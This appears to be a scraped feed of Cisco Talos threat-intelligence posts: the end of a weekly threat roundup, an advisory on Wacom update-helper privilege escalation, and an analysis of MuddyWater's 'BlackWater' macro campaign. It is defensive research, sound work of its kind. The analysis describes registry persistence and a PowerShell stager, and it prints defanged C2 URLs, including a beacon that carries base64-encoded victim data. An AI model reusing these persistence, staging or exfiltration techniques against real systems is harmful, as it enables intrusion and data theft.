  • Cisco patched a critical vulnerability in many of its devices that could allow attackers to lock out software updates. The flaw exists in Cisco’s Secure Boot process. 
  • Apple fixed a variety of bugs in its products as part of its monthly security update. WebKit had the largest number of vulnerabilities, while others exist in Mail and DesktopServices.
  • Two major Japanese online retailers say they were hit with a cyberattack that allowed attackers to steal shoppers’ information for two weeks. UNIQLO Japan and GU Japan stated that hackers breached their system using a credential-stuffing attack.

Notable recent security issues

Title: Microsoft patches 79 vulnerabilities, 22 critical
Description: Microsoft released its monthly security update today, disclosing a variety of vulnerabilities in several of its products. The latest Patch Tuesday covers 79 vulnerabilities, 22 of which are rated “critical," 55 that are considered "important" and one "moderate." This release also includes two critical advisories: one covering Microsoft Live accounts and another addressing updates to Adobe Flash Player. This month’s security update covers security issues in a variety of Microsoft’s products, including the Scripting Engine, the Microsoft Edge web browser and GDI+.
Snort SIDs: 50014 - 50025

Title: Adobe fixes critical bugs in Flash Player, Acrobat Reader
Description: Adobe disclosed 87 vulnerabilities in a variety of its products as part of its monthly security update. The majority of the bugs exist in Adobe Acrobat and Acrobat Reader. There are also critical arbitrary code execution vulnerabilities in Adobe Flash Player and Reader.
Snort SIDs: 48293, 48294, 49189, 49190, 49684, 49685

Most prevalent malware files this week

SHA 256: e4cef790c953b769c08472ace6d6f3321851fb701882ebcb76a78a413ed85505
MD5: 2c5d83f7abe17e9ccdd6dcc0622a22aa
Typical Filename: $RECYCLE.BIN .scr
Claimed Product: N/A
Detection Name: Win.Worm.Sality::1201

SHA 256: 3f6e3d8741da950451668c8333a4958330e96245be1d592fcaa485f4ee4eadb3
MD5: 3a61797cff12598b31443d5bce21e470
Typical Filename: WcInstaller.exe
Claimed Product: Web Companion Installer
Detection Name: W32.2C8CB61F62-95.SBX.TG

SHA 256: 7acf71afa895df5358b0ede2d71128634bfbbc0e2d9deccff5c5eaa25e6f5510
MD5: 4a50780ddb3db16ebab57b0ca42da0fb
Typical Filename: xme64-2141.exe
Claimed Product: N/A
Detection Name: W32.7ACF71AFA8-95.SBX.TG

SHA 256: c3e530cc005583b47322b6649ddc0dab1b64bcf22b124a492606763c52fb048f
MD5: e2ea315d9a83e7577053f52c974f6a5a
Typical Filename: Tempmf582901854.exe
Claimed Product: N/A
Detection Name: W32.AgentWDCR:Gen.21gn.1201

SHA 256: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b
MD5: 799b30f47060ca05d80ece53866e01cc
Typical Filename: 15716598f456637a3be3d6c5ac91266142266a9910f6f3f85cfd193ec1d6ed8b.bin
Claimed Product: N/A
Detection Name: W32.Generic:Gen.22fz.1201

Vulnerability Spotlight: Multiple vulnerabilities in Wacom Update Helper

$
0
0




Tyler Bohan of Cisco Talos discovered these vulnerabilities.

Executive summary

There are two privilege escalation vulnerabilities in the Wacom update helper. The update helper is a utility installed alongside the macOS application for Wacom tablets. The application interacts with the tablet and allows the user to manage it. These vulnerabilities could allow an attacker with local access to raise their privileges to root.

In accordance with our coordinated disclosure policy, Cisco Talos worked with Wacom to ensure that these issues are resolved and that an update is available for affected customers.

Vulnerability details

Wacom update helper tool startProcess privilege escalation vulnerability (TALOS-2018-0760/CVE-2019-5012)

An exploitable privilege escalation vulnerability exists in the Wacom, driver version 6.3.32-3, update helper service in the startProcess command. The command takes a user-supplied script argument and executes it under root context. A user with local access can use this vulnerability to raise their privileges to root. An attacker would need local access to the machine for a successful exploit.

Read the complete vulnerability advisory here for additional information.

Wacom update helper tool start/stopLaunchDProcess privilege escalation vulnerability (TALOS-2018-0761/CVE-2019-5013)

An exploitable privilege escalation vulnerability exists in the Wacom update helper service in the start/stopLaunchDProcess command. The command takes a user-supplied string argument and executes launchctl under root context. A user with local access can use this vulnerability to raise load arbitrary launchD agents. An attacker would need local access to the machine for a successful exploit.

Read the complete vulnerability advisory here for additional information.

Versions tested

Talos tested and confirmed that the Wacom driver on macOS, versions 6.3.32.2 and 6.3.32.3 are affected by these vulnerabilities.


Coverage

The following SNORTⓇ rules will detect exploitation attempts. Note that additional rules may be released at a future date and current rules are subject to change pending additional vulnerability information. For the most current rule information, please refer to your Firepower Management Center or Snort.org.

Snort Rules: 48850, 48851

Recent MuddyWater-associated BlackWater campaign shows signs of new anti-detection techniques

$
0
0
This blog was authored by Danny Adamitis, David Maynor, and Kendall McKay

Executive summary

Cisco Talos assesses with moderate confidence that a campaign we recently discovered called "BlackWater" is associated with suspected persistent threat actor MuddyWater. Newly associated samples from April 2019 indicate attackers have added three distinct steps to their operations, allowing them to bypass certain security controls and suggesting that MuddyWater's tactics, techniques and procedures (TTPs) have evolved to evade detection. If successful, this campaign would install a PowerShell-based backdoor onto the victim's machine, giving the threat actors remote access. While this activity indicates the threat actor is taking steps to improve its operational security and avoid endpoint detection, the underlying code remains unchanged. The findings outlined in this blog should help threat hunting teams identify MuddyWater's latest TTPs.

In this latest activity, the threat actor first added an obfuscated Visual Basic for Applications (VBA) script to establish persistence as a registry key. Next, the script triggered a PowerShell stager, likely in an attempt to masquerade as a red-teaming tool rather than an advanced actor. The stager would then communicate with one actor-controlled server to obtain a component of the FruityC2 agent script, an open-source framework on GitHub, to further enumerate the host machine. This could allow the threat actor to monitor web logs and determine whether someone uninvolved in the campaign made a request to their server in an attempt to investigate the activity. Once the enumeration commands would run, the agent would communicate with a different C2 and send back the data in the URL field. This would make host-based detection more difficult, as an easily identifiable "errors.txt" file would not be generated. The threat actors also took additional steps to replace some variable strings in the more recent samples, likely in an attempt to avoid signature-based detection from Yara rules.

This activity shows an increased level of sophistication from related samples observed months prior. Between February and March 2019, probable MuddyWater-associated samples indicated that the threat actors established persistence on the compromised host, used PowerShell commands to enumerate the victim's machine and contained the IP address of the actor's command and control (C2). All of these components were included in the trojanized attachment, and therefore a security researcher could uncover the attackers' TTPs simply by obtaining a copy of the document. By contrast, the activity from April would require a multi-step investigative approach.

BlackWater document


Talos has uncovered documents that we assess with moderate confidence are associated with suspected persistent threat actor MuddyWater. MuddyWater has been active since at least November 2017 and has been known to primarily target entities in the Middle East. We assess with moderate confidence that these documents were sent to victims via phishing emails. One such trojanized document was created on April 23, 2019. The original document was titled "company information list.doc".



Once the document was opened, it prompted the user to enable the macro titled "BlackWater.bas". The threat actor password-protected the macro, making it inaccessible if a user attempted to view the macro in Visual Basic, likely as an anti-reversing technique. The "Blackwater.bas" macro was obfuscated using a substitution cipher whereby the characters are replaced with their corresponding integer.

Image of the macro

The macro contains a PowerShell script to persist in the "Run" registry key, "KCU\Software\Microsoft\Windows\CurrentVersion\Run\SystemTextEncoding". The script then called the file "\ProgramData\SysTextEnc.ini" every 300 seconds. The clear text version of the SysTextEnc.ini appears to be a lightweight stager.

Screenshot of the stager found in the document

The stager then reached out to the actor-controlled C2 server located at hxxp://38[.]132[.]99[.]167/crf.txt. The clear text version of the crf.txt file closely resembled the PowerShell agent that was previously used by the MuddyWater actors when they targeted Kurdish political groups and organizations in Turkey. The screenshot below shows the first few lines of the PowerShell trojan. The actors have made some small changes, such as altering the variable names to avoid Yara detection and sending the results of the commands to the C2 in the URL instead of writing them to file. However, despite these changes, the functionality remains almost unchanged. Notably, a number of the PowerShell commands used to enumerate the host appear to be derived from a GitHub projected called FruityC2.

Image of the PowerShell script embedded in the document used to target Kurdish officials



Image of the PowerShell script from the threat actor-controlled server


This series of commands first sent a server hello message to the C2, followed by a subsequent hello message every 300 seconds. An example of this beacon is "hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater". Notably, the trojanized document's macro was also called "BlackWater," and the value "BlackWater" was hard coded into the PowerShell script.

Next, the script would enumerate the victim's machine. Most of the PowerShell commands would call Windows Management Instrumentation (WMI) and then query the following information:
  • Operating system's name (i.e., the name of the machine)
  • Operating system's OS architecture
  • Operating system's caption
  • Computer system's domain
  • Computer system's username
  • Computer's public IP address
The only command that did not call WMI was for the "System.Security.Cryptography.MD5CryptoServiceProvider.ComputerHash", or the command to obtain the security system's MD5 hash. This was likely pulled to uniquely identify the workstation in case multiple workstations were compromised within the same network. Once the host-based enumeration information was obtained, it was base64-encoded and then appended to the URL post request to a C2, whereas in previous versions this information was written to a text file. A copy of the encoded command is shown below:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHl=RkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYtRkYqMTk5NypFUDEq0D0uTWljcm9zb2Z0IFdpbmRvd3MgNyBQcm9mZXNzaW9uYWwqMzItYml0KlVTRVItUEMqV09SS0dST1VQ0D0uKlVTRVItUENcYWRtaW4qMTkyLjE2OC4wMDAuMDE=


Once decoded, the output of the above command became clear:

hxxp://82[.]102[.]8[.]101/bcerrxy.php?riHi=FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF-FF*1997*EP1*Ð=.Microsoft Windows 7 Professional*32-bit*USER-PC*WORKGROUPÐ=.*USER-PC\admin*192.168.000.01

Conclusion

In addition to the new anti-detection steps outlined in this report, the MuddyWater actors have made small modifications to avoid common host-based signatures and replaced variable names to avoid Yara signatures. These changes were superficial, as their underlying code base and implant functionality remained largely unchanged. However, while these changes were minimal, they were significant enough to avoid some detection mechanisms. Despite last month's report on aspects of the MuddyWater campaign, the group is undeterred and continues to perform operations. Based on these observations, as well as MuddyWater's history of targeting Turkey-based entities, we assess with moderate confidence that this campaign is associated with the MuddyWater threat actor group.

Indicators of compromise

Hashes

0f3cabc7f1e69d4a09856cc0135f7945850c1eb6aeecd010f788b3b8b4d91cad
9d998502c3999c4715c880882efa409c39dd6f7e4d8725c2763a30fbb55414b7
0d3e0c26f7f53dff444a37758b414720286f92da55e33ca0e69edc3c7f040ce2
A3bb6b3872dd7f0812231a480881d4d818d2dea7d2c8baed858b20cb318da981
6f882cc0cddd03bc123c8544c4b1c8b9267f4143936964a128aa63762e582aad
Bef9051bb6e85d94c4cfc4e03359b31584be027e87758483e3b1e65d389483e6
B2600ac9b83e5bb5f3d128dbb337ab1efcdc6ce404adb6678b062e95dbf10c93
4dd641df0f47cb7655032113343d53c0e7180d42e3549d08eb7cb83296b22f60
576d1d98d8669df624219d28abcbb2be0080272fa57bf7a637e2a9a669e37acf
062a8728e7fcf2ff453efc56da60631c738d9cd6853d8701818f18a4e77f8717

URLs

hxxp://38[.]132[.]99[.]167/crf.txt
hxxp://82[.]102[.]8[.]101:80/bcerrxy.php?rCecms=BlackWater
hxxp://82[.]102[.]8[.]101/bcerrxy.php?
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/helloServer.php
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/getCommand.php
hxxp://94[.]23[.]148[.]194/serverScript/clientFrontLine/
hxxp://136[.]243[.]87[.]112:3000/KLs6yUG5Df
hxxp://136[.]243[.]87[.]112:3000/ll5JH6f4Bh
hxxp://136[.]243[.]87[.]112:3000/Y3zP6ns7kG

Coverage


Doc.Dropper.Pwshell::malicious.tht.talos

Viewing all 1925 articles
Browse latest View live


<script src="https://jsc.adskeeper.com/r/s/rssing.com.1596347.js" async> </script>